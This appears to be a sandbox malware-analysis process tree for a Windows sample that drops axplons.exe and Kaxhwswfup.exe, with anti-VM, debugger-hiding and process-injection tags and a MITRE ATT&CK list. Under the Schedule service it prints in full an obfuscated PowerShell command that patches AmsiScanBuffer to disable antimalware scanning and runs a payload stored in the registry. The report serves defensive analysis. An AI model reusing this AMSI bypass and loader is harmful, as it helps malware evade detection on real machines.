C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2968
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AHVuQgwhrOzd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NfRTgEJJCtUklS,[Parameter(Position=1)][Type]$dJyOpuWkwB)$LcAnSsinVqg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$LcAnSsinVqg.DefineConstructor(''+[Char](82)+''+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NfRTgEJJCtUklS).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+'e,'+[Char](77)+'a'+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$LcAnSsinVqg.DefineMethod('In'+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+'wSl'+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$dJyOpuWkwB,$NfRTgEJJCtUklS).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $LcAnSsinVqg.CreateType();}$sufpmVvViIfOu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+'r'+''+'o'+''+'s'+'o'+'f'+''+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$ZjymfJTVfTBvul=$sufpmVvViIfOu.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,S'+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SkwCzzGOPSzTFMrcfIt=AHVuQgwhrOzd @([String])([IntPtr]);$RMDJYwLjzUmRvLiXwMyChL=AHVuQgwhrOzd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LwKaVIIkCQB=$sufpmVvViIfOu.GetMethod(''+[Char](71)+''+[Char](101)+'tMod'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$eqLWsUqQHjYrmS=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$LwKaVIIkCQB,[Object]('L'+'o'+''+'a'+'d'+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+'A')));$ePtYAxfWeLLAgzrrZ=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$LwKaVIIkCQB,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+'a'+'l'+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$CplHmdD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eqLWsUqQHjYrmS,$SkwCzzGOPSzTFMrcfIt).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$BIfwkkycYBVoSdUte=$ZjymfJTVfTBvul.Invoke($Null,@([Object]$CplHmdD,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$eevkJbyciN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtYAxfWeLLAgzrrZ,$RMDJYwLjzUmRvLiXwMyChL).Invoke($BIfwkkycYBVoSdUte,[uint32]8,4,[ref]$eevkJbyciN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BIfwkkycYBVoSdUte,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtYAxfWeLLAgzrrZ,$RMDJYwLjzUmRvLiXwMyChL).Invoke($BIfwkkycYBVoSdUte,[uint32]8,0x20,[ref]$eevkJbyciN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4084
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1620

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2712

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2960

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3440
- C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
  "C:\Users\Admin\AppData\Local\Temp\dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Users\Admin\AppData\Local\Temp\$77354151
        
        "C:\Users\Admin\AppData\Local\Temp\$77354151"
        5⤵
        Executes dropped EXE
        
        PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\$77af6dbd
        
        "C:\Users\Admin\AppData\Local\Temp\$77af6dbd"
        5⤵
        Executes dropped EXE
        
        PID:648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 600
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3576

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3816

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5084

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4260

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1248

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:2708

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3696

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3308

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4516

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4356
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 648 -ip 648
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2996

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3584

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion